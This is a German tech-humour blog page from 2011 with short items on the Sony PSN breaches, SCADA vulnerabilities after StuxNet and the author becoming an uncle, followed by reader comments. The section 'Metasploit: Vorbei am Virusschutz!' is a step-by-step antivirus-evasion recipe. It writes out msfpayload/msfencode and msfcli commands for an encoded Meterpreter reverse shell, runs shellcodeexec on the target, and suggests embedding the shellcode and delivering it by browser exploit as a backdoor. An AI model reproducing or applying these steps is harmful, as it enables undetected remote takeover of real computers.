HomeArtikelDownloadsForum
PCFreunde.deArtikelAllgemeinH4ckb3rts BlogH4ckb3rts Blog: Jetzt ist Schluss mit lustig!
Besucher online: 25
Hinweis
Diese Seite steht zum Verkauf.
Mehr Infos

Schnellsuche

Kategorien
Montag, 30. Mai 2011 Seite 2/22
KW 21: Onkel H4ckb3rt
H4ckb3rts Blog (Quelle: PCFreunde.de)
Man vermutet es bei meiner Blog-Historie vielleicht nicht, aber der Titel ist ganz ironiefrei: Ich bin vor wenigen Tagen Onkel geworden. Darum habe ich einen Großteil meiner Zeit nicht vor Computerbildschirmen, sondern vor dunkelblauen Babyaugen verbracht und geholfen, das neue Familienmitglied möglichst reibungsarm in die Sippe zu integrieren.

Dabei ist mir aufgefallen, dass mein kleiner Neffe mühelos die Aufmerksamkeit aller Erwachsenen im Raum auf sich zieht. Wenn er obendrein durch Schreien seinem Missmut Ausdruck verleiht, kann niemand umhin, sich ihm zuzuwenden, um sein Wohlbefinden wiederherzustellen. Egal, was die Leute – mich selbst eingeschlossen – sonst so treiben, dem Schreien eines Babys können sie sich nicht entziehen.

Nicht einmal 0tt0 ist gegen diesen Mechanismus immun. Als er seinen Antrittsbesuch bei meinem Neffen abstattete, wurde er vom Babyschreien ebenso gefangen genommen. Er holte freiwillig Nuckel und Plüschtiere herbei und trug sogar eine frisch befüllte Windel zum Mülleimer, ohne zu klagen. Erst auf dem Heimweg viel ihm auf, wie ungewöhnlich sein Verhalten für ihn war und er schlussfolgerte fasziniert: "Menschen haben ein Default-Root-Passwort: Babyschreien."
Sony: Was denn noch?
Das PlayStation Network gehackt. (Quelle: PCFreunde.de)
Von meinem geschätzten Mitbewohner habe ich mal erfahren, dass die gefährlichste Situation in einer Schlägerei die ist, wenn einer der Beteiligten am Boden liegt und der andere – oder die anderen – den am Boden Liegenden treten. In dieser misslichen Situation befindet sich gerade Sony, jedenfalls im Hinblick auf die IT-Sicherheit des Konzerns. Seit dem K.O.-Treffer, den der bisher folgenreichste Hack aller Zeiten darstellte, kriegen die Japaner einen virtuellen Tritt nach dem anderen in ihre Server.

Zur Erinnerung: Angefangen hatte alles damit, dass die Verantwortlichen bei Sony ihrer Spielkonsole PlayStation 3 durch ein Firmware-Update ein Feature entzogen hatten, das den Nutzern ein Linux-Betriebssystem bereitstellte. Nach dieser Kastrierung dauerte es folgerichtig nur wenige Monate, bis die zuvor ungehackte PS3 geknackt wurde. Wie Kleinkinder mögen es auch Hacker nun mal nicht, wenn man ihnen ihre Spielzeuge wegnimmt. Erfolgreichster und daraufhin auch bekanntester PS3-Hacker war George Hotz alias geohot. Ihn verklagte Sony vor einem kalifornischen Gericht, weil er angeblich der Raubkopiererei Vorschub geleistet habe. Das Verfahren endete mit einem außergerichtlichen Vergleich.

Doch damit hatte der Ärger für Sony erst angefangen: Wenig später drangen Unbekannte – hochwahrscheinlich als Rache für das Vorgehen gegen geohot – in die Server des Playstation Networks ein und stahlen die unverschlüsselten (!) Daten von etwa 77 Millionen PSN-Benutzerkonten. Daraufhin schaltete Sony das PSN ab. Insgesamt 23 Tage blieb das Netzwerk offline, PlayStation-Besitzer konnten nicht gegen- oder miteinander spielen, niemand konnte Games oder Demos herunterladen. Der finanzielle Schaden für Sony ging in die Milliarden. Erst am 15.Mai wurde das Netzwerk wieder hochgefahren, aber damit war das Leid noch lange nicht vorbei.

Die PSN-Nutzer, die inzwischen natürlich unter recht deutlichen Spiel-Entzugsentscheidungen litten, mussten nach der Wiederauferstehung des PSNs logischerweise ihre Passwörter ändern. Um das zu ermöglichen, sollten sie ihre E-Mail-Adresse und ihr Geburtsdatum angeben. Diese Informationen gehörten allerdings zu den Daten, die gestohlen worden waren. Die Datendiebe hätten also die Passwörter aller PSN-User gleich noch einmal klauen können. Die Passwortreset-Seite musste wieder vom Netz genommen werden. Die Verantwortlichen bei Sony beweisen auch nach dem Hack, dass sie nichts begriffen haben.

Eine italienische Bank? Von Sony Thailand? (Quelle: f-secure.com)
Aber auch damit war es nicht genug: Eine thailändische Sony-Seite wurde gehackt. Von dort wurden Besucher auf eine gefälschte Webseite einer italienischen Bank gelenkt, die dazu dienen sollte, ihnen Zugangsdaten und Kreditkarteninformationen zu entlocken. Zwar hat dieser Hack nicht direkt mit Sonys anderen Niederlagen zu tun, aber auch er illustriert die mangelhafte Sicherheitslage bei den Japanern.

Und es geht noch weiter: Ein Tochterunternehmen von Sony namens So-net ist in der zurückliegenden Woche ebenfalls gehackt worden. Bei So-net handelt es sich um einen Internet-Serviceprovider, also eigentlich Leute vom Fach. Ganz fachmännisch urteilen die Zuständigen dementsprechend, dass es keinen Zusammenhang mit den restlichen Sony-Hacks gäbe, weil die Angreifer "anders" vorgegangen seien. Beeindruckende Expertise.

Es gibt das berühmte Sprichwort, Sicherheit sei eine Kette, sie reiße am schwächsten Glied. Bei Sony gibt es auch eine Kette in der IT-Sicherheit, nämlich eine Kette von sehr peinlichen Vorfällen. Aber die scheint nicht abzureißen.
StuxNet: Nachfolger am Horizont?
Einer der angreifbaren Controller (Quelle: Wikimedia Commons)
Groß war sie, die Aufregung um den StuxNet-Wurm. Der Trojaner konnte, soweit sich das rekonstruieren ließ, SCADA-Industrieanlagen fernsteuern und sogar zerstören. StuxNet hat vermutlich in iranischen Urananreicherungsanlagen dafür gesorgt, dass das dort verfolgte Atomprogramm um Monate, wenn nicht Jahre, zurückgeworfen wurde. Und nun scheint sich zu erweisen, dass StuxNet bald Nachfolger bekommt: Dillon Beresford, ein US-amerikanischer Sicherheitsforscher, hat mehrere Softwarelücken in den Steuergeräten von SCADA-Anlagen gefunden und sagt: "Die sind ganz einfach zu hacken."

Allerdings hält er den Vortrag, in dem er diese Aussage beweisen wollte, nun doch nicht. Das amerikanische Heimatschutzministerium und der hauptsächlich betroffene SCADA-Hersteller Siemens hatten freundlich darum gebeten, die Schwachstellen noch nicht bekannt zu machen. Man braucht noch etwas mehr Zeit, um die Lücken zu stopfen. Mindestens vier Schwachstellen hat Beresford entdeckt und Siemens mitgeteilt.

Es ist aber fraglich, ob dies das Ende der Fahnenstange sein wird. So war im Zuge der StuxNet-Story bekannt geworden, dass das Passwort der SCADA-Steuersoftware WinCC in die Software eingebettet ist, sodass der Benutzer es nicht ändern kann. Wenn nach einer solchen programmiererischen Fehlleistung jetzt so schnell weitere Schwachstellen auftauchen, scheint es um die Sicherheit der Siemens-Produkte nicht gut bestellt zu sein.
Metasploit: Vorbei am Virusschutz!
---BEGIN TRANSMISSION, FROM: 0tt0_n0rmal0---

Seit dem letzten Post hier haben die Antivirus-Programme einige Updates erfahren und die dort vorgestellte Methode funktioniert nicht mehr. Außerdem ist auch das Metasploit-Framework mehrfach aktualisiert worden und hat dadurch die ganze Methodik obsolet gemacht. Es stellt sich dem geneigten Quick-and-Dirty-Pentester also wieder das Problem: Wie in ein Netzwerk eindringen, ohne selbst Malware schreiben zu müssen? Die Antwort kommt von Bernardo Damele, einem Kollegen aus London.

Er hat ein Programm geschrieben, das Shellcode direkt ausführt. Soweit ist das nichts Besonderes, aber Dameles Shellcode-Launcher lässt sich unter 32- und 64-Bit-Windows und unter 32- und 64-Bit-Linuxen kompilieren. Für ein 32-Bit-Windows liegt sogar eine fertige exe-Datei bereit. Diese Datei wird momentan von so gut wie keinem Antivirus-Programm als schädlich eingestuft.

Für sich allein ist die Datei auch nicht gefährlich, erst in Verbindung mit schädlichem Shellcode wird sie zu einer Bedrohung. Letzterer lässt sich komfortabel mit Hilfe der der Metasploit-Tools msfpayload und msfencode erzeugen. Angehängt an den Shellcode-Launcher startet man so beispielsweise eine Meterpreter-Session, die ihrerseits Ausgangspunkt für zahlreiche weitere Angriffe werden kann.

Schritt Eins: Zunächst wird dazu auf dem Angreifersystem der Shellcode erzeugt, der die Meterpreter-Session öffnet.
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 R | msfencode -a x86 -e x86/alpha_mixed -t raw
Dieser Befehl wird eine lange Zeichenkette zurückgeben, die ihrerseits in Schritt Drei als Argument an den Shellcode-Launcher zu übergeben ist.

Schritt Zwei: Vorbereitend wird außerdem der Handler gestartet, der die Session entgegennehmen wird.
msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.2 E
Schritt Drei: Jetzt wird auf dem Zielsystem, einer 32-Bit-Windows-Maschine, der Shellcode ausgeführt. Dazu ist der Shellcode, der in Schritt Eins erzeugt wurde, an den Aufruf der Datei anzuhängen.
C:\Windows\Temp> shellcodeexec.x32.exe SHELLCODE
Nach einer gewissen Wartezeit wird der Handler eine Meterpreter-Session öffnen. Ein auf der Zielmaschine eventuell installiertes Antivirus-Programm sollte dem ganzen Vorgang nichts entgegensetzen.

Wie in einem realistischen Angriff der Shellcode-Launcher auf die Zielmaschine verbracht wird und er dort als Argument den Shellcode zugeführt bekommt, ergibt sich hieraus natürlich noch nicht. Da das Programm aber im Quelltext vorliegt, ist es ein Leichtes, diesen so zu verändern, dass immer derselbe, präparierte Shellcode ausgeführt wird und diese modifizierten Code dann zu kompilieren. Die so erzeugte Hintertür ließe sich beispielsweise durch einen Browser-Exploit auf die Zielmaschine laden, ohne dass sich der Angreifer Gedanken um eventuell abwehrbereite Antivirus-Software machen müsste.

---END TRANSMISSION---
ZurückWeiter
© Copyright PCFreunde.de
Inhaltsverzeichnis
Kommentare
Schreib uns deine Meinung zu diesem Artikel - einfach registrieren und los!
Kommentar schreiben
 
Hollywood
05.01.2011 17:29
Rückblick 2010: Noch mehr Totalversagen das Video die Ak ist das geilste :mrgreen:
Wie der zweite sich schrottlacht !
 
geilo
11.01.2011 18:51
Nei das mit dem Golf 2oder das wo der Fussball Spieler ausrutscht uund die Treppe runterrustscht
 
BgF
18.01.2011 16:16
Ich hatte ja meine bedenken was Kinect angeht.
Dachte wieder an irgendwelches rumgehampel, wie bei dem Wii Hype und eigentlich ist es auch nix anderes.
Doch wenn ich mich an den Film Minority Report erinnere :mrgreen:

Bin gespannt auf die Zukunft der Bewegungssteuerung.
 
geilo
30.01.2011 15:16
Wenn ich mich an den Film (T)Raumschiff Enterprise denke dann wird es auch nicht gerade der Renner in der Raumfahrt
 
nikasio14
15.02.2011 01:13
Sony = Fail ;-) Ich hab mich selten so schlapp gelacht, danke Hackbert!
Geohot Hat seine Sache aber fast noch besser gemacht :twisted:

Was die Folgen von BigBangTheory angeht, ich hoffe die deutschen Folgen gibt es bald im kino. Total mein Fall und absolut zum "auf-dem-Boden-umherrollen" =)
Fast schon besser als two-and-a-half-men ...

 
nikasio14
07.03.2011 22:53
hallo jungs!
betreffend der plug-computer: Wie kann man die programmieren/einstellen? Über RemoteAccess oder habe ich den Bildschirm-Eingang irgendwie übersehen!? :oops:

Ich denke gerade ernsthaft über solch eine Lösung nach weil ich non-stop unterwegs bin und sicher nicht mein laptop und 3 Festplatten mitschleppe...

Wie funktioniert das genau oder hab ich da einen Thread schon übersehen?

thx nikasio14
 
nikasio14
14.03.2011 22:53
:lol: Grüßli Müsli zurück 8)

Wuha ich glaub ich lern mal was Neues über SSH =)
Danke für die Hilfe!

Ich bin schon auf die nächsten Grundlagen-Infos gespannt! Wie wärs mit einem kleinen Einstieg ins erste dezentrale (kabel-)Netzwerk mit TCP-Protokoll und der Grundidee des internets, die ja mehr oder weniger auf TCP/IP basiert!? (Ich hoffe ich hab das jetzt richtig formuliert...)


Lg nikasio14
 
Piperjoe
18.04.2011 21:56
Sehr Schade das Geohot aufgegeben hat. Aber auch verständlich. Nach monatelangen Gerichtsverhandlungen gegen so einen Riesenkonzern wie Sony ist das ganze sicher ermüdent.

Grüße
Piperjoe

P.s.: Also habe ich an die EFF gespendet :>
 
geilo
23.04.2011 20:12
Vor 2 Wochen hatte ich die Entscheidung PS3 mit Move scheiß und XBox 360 Slim mit Kinect scheiß hab mich für die XBox entschieden!
Aber das ist vollkommen verständlich warum er aufgegeben hat er weiß das Sony Macht hat die er nicht hat!
Sony steckt viel viel viel viel Kohle in der Entwicklung von Sicherhei Microsoft entwickelt paar Spiele mehr schon haben sie mehr Kohle beide kommen zum Ziel. Aber ich werde mich eh von Sony Produkten fernhalten meine PSP ist nach 2 Jahren genau kaputt gegangen sie hat sich nicht mehr aufgeladen Reparatur sinnlos kostet mehr als ein neues Gerät
 
Nvidia Freak
18.05.2011 13:40
Also mit dem Artikel über Windows und Linux kann ich mich nicht mit anfreunden. In meiner Schule haben wir vor einem Jahr auf von Windows auf Linux gewechselt. Das hat bisher wunderbar geklappt und auch sämtlicher Aufwand das Netztwerk zu betreiben ist im Gegansatz zu dem Betrieb mit Windows merklich geschrumpft. Es ist auch kein "tippintensiver Alptraum". Auch sind bisher Probleme wie Viren oder ähnliches weggefallen und sollte ein PC mal nicht mehr funktionieren, ist er innerhalb einer Viertelstunde neu aufgesetzt. Mit Windows habe ich sowas bisher noch nicht hinbekommen.
Die meisten Probleme die noch auftauchen, haben wir mit unseren verbliebenen Windows-Rechnern.

Nachtrag eines anderen Admins
Die Organisation des Auswärtigen Amts mit Linux wurde katastrophal geleitet - Stichwort "Eigene Distribution"
 
geilo
18.05.2011 22:37
Nun ja aber wer will nun extra Tage lang Treiber und Software für Linux suchen? Für eine Schule ist das nicht schwierig die brauchen nur Office aber bei CNC wird das schon schwieriger.
Vielleicht ist Linux besser aber wozu sollte ich wechseln wenn Windows so toll funktioniert?
 
Nvidia Freak
19.05.2011 20:50
Naja, auch eine Schule braucht mehr als nur Office. Und mit Windows hat es nicht sehr toll funktioniert
 
Venson
20.05.2011 16:15
Gott: Menschen Doof!


Hahah...


Definitiv einer der besten blog eintragungen von H4ckv3rts Ever^^...

ich sag euch wir menschen haben vieleicht probleme...
 
freches Frettchen
28.05.2011 16:29
Hackbarts Block ist für mich an jedem Wochenende immer das Highlight.
Köstliche Kommentare mit einer schönen Portion Ironie :lol: .
Weiter so...
l.G. vom Uwe :wink:
 
tho.moore
30.05.2011 21:33
Schade, das du aufhörst.

Dann ist das vlt die letzte Möglichkeit, dir (nochmal) für die vielen schönen, lustigen, verrückten aber immer lehrreichen Artikel zu danken.

Vielen Dank für Alles!

Viel Glück für deinen weiteren Weg :wink:
 
-luke-
30.05.2011 21:43
Kein Witz hem? Heut ist nicht der 1. April. Ok. Sollst wissen ich hab es genossen, die ganzen 1,5 Jahre die ich den Blog kenne. Echt schade aber. . . Viel Erfolg und bye!
 
Lasergraph
30.05.2011 22:26
Kann mich da nur anschliessen.

Finde es ebenfalls sehr Schade das du nun aufhörst. Aber wie du schon geschrieben hast. Alles hat ein Ende,(nur die Wurst hat zwei).

Vielen Dank für die vielen wirklich tollen Blogeinträge. Und viel Erfolg.
 
ATI Gott
30.05.2011 23:29
Schade, dass eines der Highlights von PCF ausgeht :(

Dein Blog war jede Woche wieder sehr gut geschrieben und unterhaltsam! Schönes Video als Abschied :D Wir werden dich alle vermissen :cry:
 
DezarPunk
31.05.2011 03:53
Auch ich kann mich nur aschließen, der Blog war über die Jahre immer mein Montags-Höhepunkt!

Good bye H4ckb3rt! :( *schnief!*

Und alles Gute für Deine Zukunft! :wink:
 
freches Frettchen
31.05.2011 07:03
Tja Hackbart,
da kann und will ich mich
Deinem Freund 0tt0 nur anschliessen.Ich stehe auch auf und gebe Dir stillschweigend die Hand.
Danke für die wunderschönen Beiträge.Ich habe sie immer sehr gerne gelesen und mich köstlich amüsiert darüber.
Dankeschön nochmals für Deine Beiträge und alles Gute für Deine Zukunft.

//Vieleicht juckt es Dich doch nochmals in den Fingern,und Du meldest Dich mal wieder hier.Würde mich sehr darüber freuen.

liebe Grüsse mit einer Träne im Knopfloch und einer Rose im Auge vom ollen Uwe :cry: :cry:
 
Alle BeiträgeKommentar schreiben
Community Login
eMail:
Passwort:
Auto-Login